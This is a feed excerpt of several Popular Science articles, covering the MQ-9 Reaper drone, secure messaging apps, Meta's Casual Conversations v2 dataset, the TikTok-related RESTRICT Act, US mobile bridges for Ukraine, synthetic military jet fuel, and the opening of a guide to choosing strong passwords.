Reapers can stay airborne at altitudes of up to 50,000 feet for up to 24 hours, with remote crews guiding the plane in shifts and trading off mid-flight. The Reaper’s long endurance, not just hours in the sky but its ability to operate up to 1,150 miles away from where it took off, lets it watch vast areas, looking for relevant movement below. This was a crucial part of how the US fought the counter insurgency in Iraq and especially Afghanistan, where armed Reapers watched for suspected enemies proved an enduring feature of the war, to mixed results.

While Reapers have been used for well over a decade, they have mostly seen action in skies relatively clear of hostile threats. A Reaper’s top speed is just 276 mph, and while its radar can see other aircraft, the Su-27 air superiority fighter can run laps around it at Mach 2.35. In seeking a future replacement for Reapers, the US Air Force has stated an intention that these planes be able to defend themselves against other aircraft.

Have drones like the Reaper been shot down before?

The most famous incident of a US drone shoot-down is the destruction of an RQ-4 Global Hawk by Iran in June 2019. This unarmed surveillance drone was operating in the Gulf of Oman near the Strait of Hormuz, a highly trafficked waterway that borders Iran on one side and the Arabian Peninsula on the other. Iran claimed the Global Hawk was shot down within Iran’s territorial waters; the United States argued instead that the drone was operating in international waters. While the crisis did not escalate beyond the destruction of the drone, it was unclear at the time that this incident would end calmly.

Reapers have been shot down by militaries including the US Air Force. In 2009, US pilots lost control of an MQ-9 Reaper over Afghanistan, so a crewed fighter shot it down proactively before it crashed into another country.

In 2017 and again in 2019, Houthi insurgent forces in Yemen shot down US Reapers flying over the country. Reapers have also been lost to jamming, when the signals between operators and drone were obstructed or cut, as plausibly happened to a Reaper operated by the Italian military over Libya in 2019.

Ultimately, the March 14 takedown of the Reaper by Russian fighters appears to be part of the larger new normal of drones as a part of regular military patrols. Like with the US destruction of a surveillance balloon in the Atlantic, the most interesting lesson is less what happened between aircraft in the sky, and more what is discovered by whoever gets to the wrecked aircraft in the water first.

The post What to know about the MQ-9 Reaper, the drone the US just lost over the Black Sea appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
7 secure messaging apps you should be using https://www.popsci.com/story/diy/best-secure-messaging-apps/ Mon, 16 Aug 2021 18:25:40 +0000 https://stg.popsci.com/uncategorized/best-secure-messaging-apps/
Person on a New York City subway train texting on their phone.
You have a lot of options when it comes to choosing among the most secure messaging apps. Ketut Subiyanto / Pexels

You might want to rethink your favorite messaging app and opt for something more secure.

The post 7 secure messaging apps you should be using appeared first on Popular Science.

]]>
Person on a New York City subway train texting on their phone.
You have a lot of options when it comes to choosing among the most secure messaging apps. Ketut Subiyanto / Pexels

When choosing a messaging app, it’s easy to just fall in line with whatever your friends and family have on their phones. Whether or not the platform is secure isn’t often a major factor in the decision. But maybe it should be, given the sheer amount of sensitive information we share with our contacts every day.

Not all messaging apps are the same, especially when it comes to your privacy and security. If you’re in the market for a more secure messaging app, we can help. The web is wide and diverse, and there are plenty of platforms that will satisfy your texting needs without asking you to disclose everything about yourself. It’s just a matter of looking.

You’ll be on your own when talking everyone else into moving to another platform, but we believe in you.

Signal

The gold standard of secure messaging apps, Signal is a stripped-down platform designed to put privacy and security first. In fact, the app’s protocol, developed by Open Whisper Systems, is also embedded within the code of competitors such as WhatsApp and Skype, and inspired Viber’s customized version.

Signal is free, open-source, and operated by The Signal Foundation—a non-profit with a mission to “develop open source privacy technology.” Brian Acton, one of WhatsApp’s founders, left Facebook (reportedly on bad terms) after the company acquired his platform, and donated $50 million to create the foundation. It’s one of the main reasons users trust the app, as there’s no big tech company behind it.

The platform supports texting, video and voice calls, as well as file-sharing. Privacy-wise, you can set your messages to self-destruct at any time from one second after they’re read to four weeks after you send them. End-to-end (E2E) encryption protects everything you share through Signal by default, and the foundation says it doesn’t store any sensitive information. The US government subpoenaed user data in 2016, but authorities only got their hands on the dates accounts were created, dates of last connections, and phone numbers.

Of course, handing over a phone number to create an account—and automatically sharing it with anybody who might find you through the app—means you won’t be entirely anonymous. Signal’s developers say they’re thinking of a way around it, but as of writing, there’s no date or specific project in the works to resolve this.

Still, Signal does its job well, and as more people get on board, it’ll be easier to keep in touch with your loved ones without anybody snooping around.

Signal is free for iOS, iPadOS, Android, macOS, Windows, and Linux.

WhatsApp

WhatsApp got a bad rap in 2021 when Meta, its parent company, announced a controversial update to the app’s privacy policy that would allow it to share information with Facebook and Instagram. People did not like it, and WhatsApp hit the pause button. The platform stopped sending notifications promoting the new privacy policy, and those who didn’t accept it have been able to continue using the app with no problems.

Sketchy privacy practices aside, WhatsApp is a versatile messaging app that’s fully end-to-end encrypted. The app supports text and voice messaging, voice and video calls, and sharing images, videos, documents, and other types of files. The platform has kept up with contemporary privacy and security features too, adding disappearing messages and the ability to entirely delete messages from private and group chats.

[Related: The 7 best apps for all your group chats]

WhatsApp also supports group chats with up to 1,024 members. The platform had a higher limit in the past, but that turned into a problem when the app became an effective tool for the propagation of misinformation and other illegal material. As a result, WhatsApp eventually limited the ability to forward messages and the size of group chats.

It’s unclear whether Meta will persist with its plans to integrate WhatsApp’s operation more intimately into the rest of its platforms, but the messaging app today enjoys the trust of more than 2 billion users worldwide, so you definitely won’t run out of people to talk to. 

WhatsApp is free for iOS, Android, macOS, and on the web.

Telegram

Telegram got its day in the sun when WhatsApp’s ill-received privacy policy announcement directly resulted in Telegram’s user base growing. The app reached 500 million users that year and has continued to grow, reinforcing its fame as a top-tier secure messaging app.

The app supports texting, voice and video calls, public channels, and file-sharing, with an interface highly similar to WhatsApp’s iOS appearance, so switching over from Meta’s messaging app should be seamless.

The platform also uses E2E encryption, but not by default. Only Secret Chats, which are one-to-one, are protected by this protocol. These chats leave no trace: they cannot be forwarded, leave no trace on Telegram’s servers, and you can have sent messages self-destruct after a specific time. This is great from a privacy standpoint, but it also means that all other communications (group chats, channels, and non-secret chats) are cloud-based and encryption protection ends when they hit the server.

[Related: Bring your WhatsApp stickers with you to Telegram]

The lack of widespread E2E encryption is meant to give users instant access to backups on multiple devices, no matter when they joined a channel or group chat, Telegram says. Pavel Durov, one of the app’s founders, also argues that government agencies might target users using “niche apps” such as Signal, assuming that anyone opting for that high level of privacy has something to hide. Having less-secure encryption as the default, Telegram says, protects users from unwanted surveillance.

As opposed to WhatsApp, which uses third-party servers like iCloud or Google Drive to store backups—giving Apple and Google the ability to manage that information—Telegram’s backups are broken into pieces and live on its own servers around the world. It claims chats, no matter what type, are all secured the same way, but because Telegram technically also has access to the encryption key, they can decrypt your messages… even if they say the key and the data it decrypts are never in the same place

Even though Telegram emphasized its commitment to security by updating its privacy policy to protect the identity of Hong Kong protesters in 2019, that commitment should be taken with a grain of salt, according to Gennie Gebhart, acting activism director at the Electronic Frontier Foundation.

“Telegram doesn’t have a great track record of responding to high-risk users,” she says. “My impression is that a lot of Telegram’s ‘secure’ reputation comes from its association with the Hong Kong protests, but the app was also useful in that environment for a lot of specific reasons, like no phone number requirement or the support for massive groups.”

That last feature, which allows users to create chats that can impressively host up to 200,000 members, is a major reason the platform has been criticized. These unmoderated public channels have also become fertile ground for the distribution of misinformation and illegal content, such as revenge and child pornography. But unlike WhatsApp, Telegram has refused to reduce that limit.

Telegram is free for iOS, iPadOS, Android, macOS, Windows, Linux, and on the web.

Dust

Less popular than Signal or Telegram, Dust is a good option if you want to keep your content as secure as you can. Beyond E2E encryption, the app has a privacy-focused functionality that lets users hide their tracks online, and a monitoring system that will instantly alert you if any of your passwords are compromised as part of a data leak.

By default, messages (or “dusts”) disappear from the app’s servers right after you send them, and chat histories are automatically erased from your phone every 24 hours. On top of that, you (or your contacts) can delete messages on both ends of the conversation with just one tap, and you can sign up by using only your phone number.

The bad news is that the platform doesn’t currently support video calls or voice messages—only texting, file sharing, and voice calling—which may be a deal-breaker if you want a more comprehensive service.

Dust is free for iOS and Android.

There are a lot of secure messaging apps to choose from.
Protect your data by choosing secure messaging apps. Chris Yang / Unsplash

Threema

This app is open-source, E2E encrypted, and—just like Dust and Signal—deletes messages from its servers right after they’re delivered. Threema doesn’t require a phone number or email to sign up, instead verifying each user with a Threema ID, an 8-digit number that allows them to be completely anonymous.

Threema supports texting, voice and video calls, but its major drawback is that you have to pay for it. The company says this allows its developers to sustain the platform without ads or data-harvesting, and it might also explain why it only had 11 million users worldwide as of October 2022. You can use it on the web, Windows, and macOS, but there are restrictions and you need to have the mobile app on your phone or tablet.

Threema is $5 for iOS, iPadOS, and Android.

Viber

Like many of the other apps on this list, Viber will protect your content (texts, voice calls, and video chats) with default E2E encryption, whether you’re engaging in one-on-one conversations or group interactions. Chatbots and communities are the exceptions to this rule.

If you choose this app, you’ll have to make sure you have version 6.0 or later, as they’re the only ones with E2E-encrypted messaging. Unfortunately, you’ll also have to worry about what version other people have, too: if you’re chatting with someone using an older version of Viber, you can kiss E2E encryption bye-bye. If you’re unsure if a chat is E2E encrypted, you can check by going to the chat info screen and looking for a lock icon next to Encrypted chat. 

[Related: The best apps for sending self-destructing messages]

Just like Telegram, Viber also has public channels called Communities, and these messages are only SSL encrypted. This protects data in transit, but once it’s on the app’s servers, it’s readable by Viber or any other member of the community, allowing new members to access all backlogs.

Viber’s privacy features include the ability to set self-destructing timers for messages, edit and delete messages on all devices with a tap, and either get notifications if a user takes a screenshot of a disappearing message (iOS) or blocks the screenshot altogether (Android). You can also create Hidden chats and access them with a PIN whenever you want, 

Viber is free for iOS, iPadOS, Android, Huawei’s App Gallery, macOS, Windows, and Linux.

iMessage

If you’re an Apple user, you’re in luck, as you have access to the company’s built-in E2E encrypted messaging platform. Now, the catch is that iMessage only works with this security standard when you’re chatting with other Apple users—if one of your friends uses an Android device, privacy pretty much goes out the window.

Because iMessage doesn’t play nice with other messaging apps, it immediately switches to the not-so-good-ol’ SMS message whenever it cannot use Apple’s protocol, turning chat bubbles from blue to green. This type of message is reliable, as it doesn’t require your device to have lots of bars to work, but it’s neither secure nor private—SMS messages can be traced, intercepted, and stored by your service provider, who can gladly hand them over to authorities, if asked politely.

This is also an issue for interactions between Apple users, though. By default, iMessage switches gears also when connectivity is low. The problem is that you won’t actually know if this has happened, as individual bubbles in your chats won’t change color to show how they were delivered.

The good news is that you can disable this feature—just go to the Messages settings menu and turn off the toggle switch next to Send as SMS.

iMessage is built into Apple devices.

Updated February 4, 2021 to more accurately reflect that Telegram’s user base as of January 2021 was 500 million users worldwide.

This story has been updated. It was originally published on January 18, 2021.

The post 7 secure messaging apps you should be using appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Meta attempts a new, more ‘inclusive’ AI training dataset https://www.popsci.com/technology/meta-ai-casual-conversations-v2/ Fri, 10 Mar 2023 17:20:00 +0000 https://www.popsci.com/?p=518786
Meta logo on smartphone resting atop glowing keyboard
Meta won't say how much it paid its newest dataset participants for their time and labor. Deposit Photos

Experts say Casual Conversations v2 is an improvement, but questions remain about its sourcing and labor.

The post Meta attempts a new, more ‘inclusive’ AI training dataset appeared first on Popular Science.

]]>
Meta logo on smartphone resting atop glowing keyboard
Meta won't say how much it paid its newest dataset participants for their time and labor. Deposit Photos

With the likes of OpenAI’s ChatGPT and Google’s Bard, tech industry leaders are continuing to push their (sometimes controversial) artificial intelligence systems alongside AI-integrated products to consumers. Still, many privacy advocates and tech experts remain concerned about the massive datasets used to train such programs, especially when it comes to issues like data consent and compensation from users, informational accuracy, as well as algorithmically enforced racial and socio-political biases. 

Meta hoped to help mitigate some of these concerns via Thursday’s release of Casual Conversations v2, an update to its 2021 AI audio-visual training dataset. Guided by a publicly available November literature review, the data offers more nuanced analysis of human subjects across diverse geographic, cultural, racial, and physical demographics, according to the company’s statement.

[Related: No, the AI chatbots (still) aren’t sentient.]

Meta states v2 is “a more inclusive dataset to measure fairness,” and is derived from 26,467 video monologues recorded in seven countries, offered by 5,567 paid participants from Brazil, India, Indonesia, Mexico, Vietnam, Philippines, and the United States who also provided self-identifiable attributes including age, gender, and physical appearance. Although Casual Conversations’ initial release included over 45,000 videos, they were drawn from just over 3,000 individuals residing in the US and self-identifying via fewer metrics.

Tackling algorithmic biases in AI is a vital hurdle in an industry long plagued by AI products offering racist, sexist, and otherwise inaccurate responses. Much of this comes down to how algorithms are created, cultivated, and provided to developers.

But while Meta touts Casual Conversations v2 as a major step forward, experts remain cautiously optimistic, and urge continued scrutiny for Silicon Valley’s seemingly headlong rush into an AI-powered ecosystem.

“This is [a] space where almost anything is an improvement,” Kristian Hammond, a professor of computer science at Northwestern University and director of the school’s Center for Advancing the Safety of Machine Intelligence, writes in an email to PopSci. Hammond believes Meta’s updated dataset is “a solid step” for the company—especially considering past privacy controversies—and feels its emphasis on user consent and research participants’ labor compensation is particularly important.

“But an improvement is not a full solution. Just a step,” he cautions.

To Hammond, a major question remains regarding exactly how researchers enlisted participants in making Casual Conversations v2. “Having gender and ethnic diversity is great, but you also have to consider the impact of income and social status and more fine-grained aspects of ethnicity,” he writes, adding, “There is bias that can flow from any self-selecting population.”

[Related: The FTC has its eyes on AI scammers.]

When asked about how participants were selected, Nisha Deo of Meta’s AI Communications team told PopSci via email, “I can share that we hired external vendors with our requirements to recruit participants,” and that compensatory rates were determined by these vendors “having the market value in mind for data collection in that location.”

When asked to provide concrete figures regarding pay rates, Meta stated it was “[n]ot possible to expand more than what we’ve already shared.”

Deo, however, additionally stated Meta deliberately incorporated “responsible mechanisms” across every step of data cultivation, including a comprehensive literature review in collaboration with academic partners at Hong Kong University of Science and Technology on existing dataset methodologies, as well as comprehensive guidelines for annotators. “Responsible AI built this with ethical considerations and civil rights in mind and are open sourcing it as a resource to increase inclusivity efforts in AI,” she continued.

For industry observers like Hammond, improvements such as Casual Conversations v2 are welcome, but far more work is needed, especially when the world’s biggest tech companies appear to be entering an AI arms race. “Everyone should understand that this is not the solution altogether. Only a set of first steps,” he writes. “And we have to make sure that we don’t get so focused on this very visible step… that we stop poking at organizations to make sure that they aren’t still gathering data without consent.”

The post Meta attempts a new, more ‘inclusive’ AI training dataset appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Why some US lawmakers want to ban TikTok https://www.popsci.com/technology/tiktok-ban-restrict-act/ Wed, 08 Mar 2023 21:35:28 +0000 https://www.popsci.com/?p=518269
tiktok
The RESTRICT ACT focuses what Senator Mark Warner of Virginia's office describes as the "ongoing threat posed by technology from foreign adversaries.". Deposit Photos

Here’s what the newly introduced RESTRICT Act says about technology, China, and more.

The post Why some US lawmakers want to ban TikTok appeared first on Popular Science.

]]>
tiktok
The RESTRICT ACT focuses what Senator Mark Warner of Virginia's office describes as the "ongoing threat posed by technology from foreign adversaries.". Deposit Photos

Yesterday, lawmakers introduced a new bipartisan Senate bill that would give the US government the power to ban TikTok. The bill is called, clunkily, the Restricting the Emergence of Security Threats that Risk Information and Communications Technology, or RESTRICT Act. It was introduced in part by Sen. Mark Warner of Virginia, who is also the chair of the Senate Intelligence Committee, and it would allow the Commerce Department to review deals, software updates, and data transfers from apps and tech companies in which “foreign adversaries,” specifically the governments of China, Cuba, Iran, North Korea, Russia, and Venezuela, have an interest. 

It’s the latest—and perhaps the closest to becoming law—in a long line of proposals that look to limit the potential for the Chinese Communist Party (CCP) to exert influence on TikTok, and by extension, its users around the world.

Both the US and European Union governments are considering banning TikTok, limiting how it can handle customer data, and generally just increasing the regulatory burden it’s under compared to, say, Facebook or Instagram. Both entities have gone so far as to ban it on government staff’s work phones over espionage fears. Let’s take a look at why. 

Although TikTok has over 100 million active monthly users in the US and at least 10,000 employees across the US and Europe, its parent company, ByteDance, is headquartered in Beijing, China. This has led to some security concerns as well as plenty of bellicose posturing from US lawmakers and China-hawks. 

The security concerns come in part because ByteDance has bowed down to the CCP in the past. For example, in 2018, its then-CEO and founder, Zhang Yiming, had to issue a groveling, self-criticizing apology after the CCP compelled it to shut down one of its other apps. He promised to “further deepen cooperation” with the authoritarian government.

TikTok and ByteDance employees also have a manual override for what goes viral and gets promoted by the app’s “For You” algorithm. Earlier this year, a Forbes report on the “heating” feature revealed that TikTok frequently promoted videos in order to court influencers and brands and entice them into partnerships based on inflated video view counts. The concern here is that government propaganda, fake news, and anything else could be manipulated in the same way. 

Then there are legitimate concerns about TikTok’s data handling practices. Last year, a BuzzFeed news report revealed that engineers in China were able to access data from US users, despite the information supposedly being stored in the US. TikTok’s COO, Vanessa Pappas, did little to alleviate those concerns in a grilling before the Senate Homeland Security and Governmental Affairs Committee last summer. Finally, TikTok had to fire four employees based in the US and China for attempting to spy on reporters, including Emily Baker-White who wrote both the Forbes and BuzzFeed investigations. 

Of course, the app also enjoys a huge amount of popularity domestically—more than two-thirds of teens use TikTok, after all. 

As David Greene, civil liberties director of the Electronic Frontier Foundation, explains over Zoom, ByteDance and TikTok aren’t really handling data or bowing down to government pressure in a wildly different way compared to other social media apps. The big difference is where ByteDance is headquartered. 

Greene also thinks any US government attempt to ban TikTok is on shaky ground. “If the government wants to ban a way for people in this country to communicate with each other and with other people, it’s going to have to do so within the framework of the First Amendment,” he says. 

As Greene explains it, this means the US government will need to show that not only does some real threat to the public exist, but also that banning TikTok is justified. “It can’t just be responding to undifferentiated fear, or to uninvestigated or unproven concerns, or at the worst, xenophobia,” he says. 

TikTok is also fighting hard to ensure it can continue to operate in the US and Europe. It’s recently launched Project Texas and Project Clover, multi-billion dollar restructuring plans that would involve storing US data in the US and European data in Ireland and Norway in ways that they could not be accessed in China. Whether these efforts can reassure lawmakers that it doesn’t need additional oversight—or worse, a total ban—remains to be seen.

The same day the bill was introduced, the White House said in a statement from the National Security Advisor that they “urge Congress to act quickly to send it to the President’s desk.” You can watch Senator Warner talk more about the bill here.

The post Why some US lawmakers want to ban TikTok appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Ukraine is getting mobile bridges from the US. Here’s how they can help. https://www.popsci.com/technology/armored-vehicle-launched-bridge-ukraine/ Tue, 07 Mar 2023 23:00:00 +0000 https://www.popsci.com/?p=518005
armored vehicle launched bridge
An Armored Vehicle Launched Bridge seen in 2017 in Wisconsin. John Russell / US Army

They are technically known as Armored Vehicle Launched Bridges, and setting them up takes minutes.

The post Ukraine is getting mobile bridges from the US. Here’s how they can help. appeared first on Popular Science.

]]>
armored vehicle launched bridge
An Armored Vehicle Launched Bridge seen in 2017 in Wisconsin. John Russell / US Army

On March 3, the Department of Defense announced it would be sending mobile bridges to Ukraine. The bridges are the signature part of the Pentagon’s 33rd offering of existing US equipment to supply Ukraine, since Russia invaded the country in February 2022. These vehicles that can place bridges, along with the other equipment sent, are reflections of the shape of the war so far, and offer a glimpse into the tools the Biden Administration expects Ukraine to need in the coming spring thaw.

An Armored Vehicle Launched Bridge, or AVLB, is essentially a portable and durable structure that is carried, placed, and then removed by a modified tank hull. The specific Armored Vehicle Launched Bridges that will be sent to Ukraine are ones based on an M60 tank chassis, our colleagues at The War Zone report

Rivers, chasms, and deep gaps in terrain can form impassable barriers to militaries, allowing defenders to concentrate forces at existing bridges or crossings. Getting over such a gap can necessitate flying to the other side, though that depends on an air transport force capable of massive movement and a cleared landing zone. It could mean physically building a new bridge, which can take time and is vulnerable to attack. Or it could mean bringing the bridge to the battlefield on the back of a tank and plopping it down as needed.

“These vehicles are designed to accompany armored columns and give them the ability to cross rivers, streams, ditches and trenches. The bridges are carried on the chassis of armored vehicles and launched at river or stream banks. Once the crossing is finished, the vehicle can pick up the bridge on the far bank and carry on,” the Department of Defense said in a release about this latest drawdown.

The exact number and model of the AVLBs sent to Ukraine is not yet known, though the general family is M60, or derived from the M60 Patton tank. That makes the models of a particular Cold War vintage, designed for the lighter armored vehicles and tanks of that era. Variants of the M60 AVLB have seen action in Vietnam, and have seen use in training exercises with NATO as well as in wars like Iraq.

The bridges are stored folded in half. When put in place by the vehicle, the bridges span 60 feet, can support up to 70 tons, and are 12.5 feet wide. Setting up the bridge takes between 2 and 5 minutes, and retrieving the bridge, which can be done at either end, takes about 10 minutes

Some heavier vehicles, including modern combat tanks, can only use the bridge at slower speeds and over narrower gaps. The US Army and Marine Corps are working on a new bridge and launcher capable of supporting Bradley fighting vehicles and Abrams tanks, to better meet the needs of the US military.

Even with limitations, the bridges will expand how and where Ukrainian forces can operate and move. Being able to rapidly span a narrow but otherwise impassable river dramatically expands how and where an army can move and attack, creating room for surprise. 

In addition, the announcement of the drawdown package notes that the US is sending Ukraine “demolition munitions and equipment for obstacle clearing,” which can facilitate both cleaner retreats and surprise advances. War leaves battlefields littered with craters, ruins, unexploded bombs, and deliberately set mines. Blasting a way through such hazards can restore movement to otherwise pinned forces.

Beyond the bridges and demolition equipment, the latest drawdown includes three kinds of artillery ammunition. The HIMARS rocket artillery systems, invaluable for Ukraine’s fall offensives, are getting resupplied with more rockets. The United States is also supplying Ukraine with 155mm and 105mm artillery rounds, for howitzers donated by the US and NATO allies to the country. These weapons use different ammunition than the Soviet-inherited stock that made up the bulk of Ukraine’s artillery before the war, and are still the overall majority of artillery pieces on hand today. But supplies for Soviet-pattern ammunition are scarce, as it’s also the size used by Russia, and Russia aggressively bought up existing stockpiles of the rounds around the world.

The fourth kind of ammunition included in the drawdown is 25mm, or the kind used by Bradley Infantry Fighting Vehicles. This tracked, turreted, and armed craft are more a form of fighting transport than a tanks, despite their appearance, but their 25 mm cannons are useful against all sorts of vehicles below the heavy armor of a tank. The package also includes tools for maintenance, vehicle testing and diagnostics, spare parts, and other of the less flashy but still invaluable work of ensuring vehicles can stay functional, or at least be repaired and brought back into use quickly.

Taken altogether, the latest drawdown of equipment fits the pattern of supplies to Ukraine this year. US supplies continue to give Ukraine the tools to fight existing artillery duels along grinding front lines, as well as building up the armored forces and accompanying features, like mobile bridges, needed for a future offensive.

The post Ukraine is getting mobile bridges from the US. Here’s how they can help. appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Why the US military plans to start making its own jet fuel https://www.popsci.com/technology/us-military-synthetic-jet-fuel-air-company/ Fri, 03 Mar 2023 15:00:00 +0000 https://www.popsci.com/?p=516870
An F-16 with its afterburner lit takes off from a base in Japan in 2016.
An F-16 with its afterburner lit takes off from a base in Japan in 2016. Yasuo Osakabe / US Air Force

Traditional jet fuel is a petroleum product that comes from the ground, but it can also be created synthetically. Here's how.

The post Why the US military plans to start making its own jet fuel appeared first on Popular Science.

]]>
An F-16 with its afterburner lit takes off from a base in Japan in 2016.
An F-16 with its afterburner lit takes off from a base in Japan in 2016. Yasuo Osakabe / US Air Force

Before the jet fuel that powers an aircraft’s engines can be burned, it begins its life in the ground as a fossil fuel. But the US military is exploring new ways of producing that fuel, synthetically, and on site, where it needs to be used. They’ve just announced a contract for as much as $65 million to Air Company, a Brooklyn-based company that has developed a synthetic fuel that doesn’t take its starting materials from the ground. 

In announcing the contract, the Department of Defense notes that it has an eye on both security concerns and the environment. Getting airplane fuel where it needs to go, the DoD notes, “often involves a combination of ships, tanker planes, and convoys.” And these same transport mechanisms, the military adds, can “become extremely vulnerable.” 

Here’s how the fuel works, why the military is interested, and what the benefits and drawbacks are of this type of approach. 

The chemistry of synthetic jet fuel 

This DOD initiative is called Project SynCE, which is pronounced “sense,” and clunkily stands for Synthetic Fuel for the Contested Environment. By contested environment, the military is referring to a space, like a battlefield, where a conflict can occur.

The building blocks of the fuel from Air Company involve hydrogen and carbon, and the process demands energy. “We start with renewable electricity,” says Stafford Sheehan, the CTO and co-founder of Air Company. That electricity, he adds, is used “to split water into hydrogen gas and oxygen gas, so we get green hydrogen.” 

But fuel requires carbon, too, so the company needs carbon dioxide to get that element. “For Project SynCE specifically, we’re looking at on-site direct-air capture, or direct ocean-capture technologies,” he says. But more generally, he adds, “We capture carbon dioxide from a variety of sources.” Currently, he notes, their source is CO2 “that was a byproduct of biofuel production.” 

So the recipe’s ingredients call for carbon dioxide, plus the hydrogen that came from water. Those elements are combined in a fixed bed flow reactor, which is “a fancy way of saying a bunch of tubes with catalysts,” or, even more simply, “tubes with rocks in them,” Sheehan says. 

[Related: Sustainable jet fuel is taking off with commercial airlines]

Jet fuel itself primarily consists of molecules—known as paraffins—made of carbon and hydrogen. For example, some of those paraffins are called normal paraffins, which is a straight line of carbons with hydrogens attached to them. There are also hydrocarbons present called aromatic compounds. 

“You need to have those aromatic compounds in order to make a jet fuel that’s identical to what you get from fossil fuels,” he says, “and it’s very important to be identical to what you get from fossil fuels, because all of the engines are designed to run on what you get from fossil fuels.”  

Okay, enough chemistry. The point is that this fuel is synthetically made, didn’t come out of the ground, and can be a direct substitute for the refined dinosaur juice typically used in aircraft. “You can actually make jet fuel with our process that burns cleaner as well, so it has fewer contrails,” he says. It will still emit carbon when burned, though.

Why the Department of Defense is interested 

This project involves a few government entities, including the Air Force and the Defense Innovation Unit, which acts as a kind of bridge between the military and the commercial sector. So where will they start cooking up this new fuel? “We plan to pair this technology with the other renewable energy projects at several joint bases, which include solar, geothermal, and nuclear,” says Jack Ryan, a project manager for the DIU, via email. “While we can’t share exact locations yet, this project will initially be based in the Continental US and then over time, we expect the decreasing size of the machinery will allow for the system to be modularized and used in operational settings.” 

Having a way to produce fuel in an operational setting, as Ryan describes it, could be helpful in a future conflict, because ground vehicles like tanker trucks can be targets. For example, on April 9, 2004, in Iraq, an attack known as the Good Friday Ambush resulted in multiple deaths; a large US convoy was carrying out an “emergency delivery of jet fuel to the airport” in Baghdad, Iraq, as The Los Angeles Times noted in a lengthy article on the incident in 2007. 

“By developing and deploying on-site fuel production technology, our Joint Force will be more resilient and sustainable,” Ryan says.

[Related: All your burning questions about sustainable aviation fuel, answered]

Nikita Pavlenko, a program lead at the International Council on Clean Transportation, a nonprofit organization, says that he is excited about the news. “It’s also likely something that’s still quite a ways away,” he adds. “Air Company is still in the very, very initial stages of commercialization.” 

These types of fuels, called e-fuels, for electrofuels, don’t come in large amounts, nor cheaply. “I expect that the economics and the availability are going to be big constraints,” he says. “Just based off the underlying costs of green hydrogen [and] CO2, you’re probably going to end up with something much more expensive than conventional fuel.” In terms of how much fuel they’ll be able to make synthetically, Ryan, of the DIU, says, “It will be smaller quantities to begin with, providing resiliency to existing fuel supply and base microgrids,” and then will grow from there. 

[Related: Airbus just flew its biggest plane yet using sustainable aviation fuel]

But these types of fuels do carry environmental benefits, Pavlenko says, although it’s important that the hydrogen they use is created through green means—from renewable energy, for example. The fuel still emits carbon when burned, but the benefits come because the fuel was created by taking carbon dioxide out of the atmosphere in the first place, or preventing it from leaving a smokestack. Even that smokestack scenario is environmentally appealing to Pavlenko, because “you’re just kind of borrowing that CO2 from the atmosphere—just delaying before it goes out in the atmosphere, rather than taking something that’s been underground for millions of years and releasing it.” (One caveat is down the line, there ideally aren’t smokestacks belching carbon dioxide that could be captured in the first place.) 

For its part, the Defense Innovation Unit says that they’re interested in multiple different ways of obtaining the carbon dioxide, but are most enthused about getting it from the air or ocean. That’s because those two methods “serve the dual purpose of drawing down CO2 from the air/water while also providing a feedstock to the synthetic fuel process,” says Matt Palumbo, a project manager with the DIU, via email. Palumbo also notes that he expects this period of the contract to last about two to five years, and thinks the endeavor will continue from there.

The post Why the US military plans to start making its own jet fuel appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
The Opt-Out: Stop choosing bad passwords already https://www.popsci.com/diy/best-passwords/ Thu, 02 Mar 2023 14:00:00 +0000 https://www.popsci.com/?p=516469
Red strength test with different tiers of password security against a cyan background.
Step right up! Test how secure your passwords are. Lauren Pusateri

Please secure your accounts properly. We’re begging you.

The post The Opt-Out: Stop choosing bad passwords already appeared first on Popular Science.

]]>
Red strength test with different tiers of password security against a cyan background.
Step right up! Test how secure your passwords are. Lauren Pusateri

Your passwords are probably terrible and you need to make them stronger. Yes, we know there are few things more annoying than brainstorming a fresh credential every time you need to do the tiniest task, but they’re one of the most practical ways to keep hackers and other malicious actors out of your business.

Tech companies, journalists, and organizations concerned with cybersecurity awareness have spent years underscoring the importance of secure passwords. Sadly, it seems there has been little payoff. A 2022 report by credential manager NordPass is truly embarrassing, listing “password,” “123456,” and “123456789” as the three most common passwords. It doesn’t get much better than that as you go further down, either: “Password1” ranks at No. 192.

It’s worth noting that the tech industry has spent decades imagining a password-free world, and some companies are already offering options to circumvent or ditch this type of authentication altogether. But as long as passwords remain the primary way to access our data, we’ll need to up our game to properly protect our information and money.

What is a strong password, and why is it so hard to create one?

In their attempts to gain access to your accounts, malicious third parties might try to use methods like guessing attacks. There are several variations to this approach, but they all work in a similar way: grabbing a key (a known common password or a personal credential leaked online) and seeing how many doors it will open.

[Related: Why government agencies keep getting hacked]

Of course, attackers aim for efficiency, so they’re not manually typing on a laptop somewhere. They’re using software to automatically try every entry in a common password dictionary, for example, or using information from known data breaches to try leaked passwords and/or their potential iterations. This is because people don’t update their passwords as regularly as they should (they do it once or twice a year instead of the recommended every three months), and when they do, they tend to make only minor changes to the ones they already have.

This is why strong passwords are unique, long, and peppered with special characters like punctuation marks, numbers, and uppercase letters. When we say unique, we mean words you can’t find in the dictionary. Common or famous names are out too—the more original the password, the better. The length of a password and the use of special characters both increase the odds that it is truly unique. It’s just math—the greater the number and variety of characters you use in your credentials, the more possible combinations there are, and the harder they will be to guess. 

A lot of people come up with their own secret code to develop passwords using easy-to-remember phrases from songs, poems, and movies. A classic approach is to replace letters with numbers (like 4s for A’s and 0s for O’s) and alternate uppercase and lowercase letters. If this is what you do, you’re on the right track, but you actually need to make your personal cryptography even more complicated to truly add security to your passwords. We won’t tell you how we encrypt our credentials, but you can create your own written language or alphabet by replacing letters with other characters. Just keep in mind that Klingon was built from utter gibberish, so the sky is the limit.   

Naturally, the cost of added difficulty is a higher cognitive burden. This means that the further a password is from a word or phrase you commonly use, the harder it’ll be for you to remember. That’s complicated as it is, but if you consider that the average person has around 100 online accounts, the feasibility of remembering all of those encoded unique passwords goes violently out the window.  

Help us help you

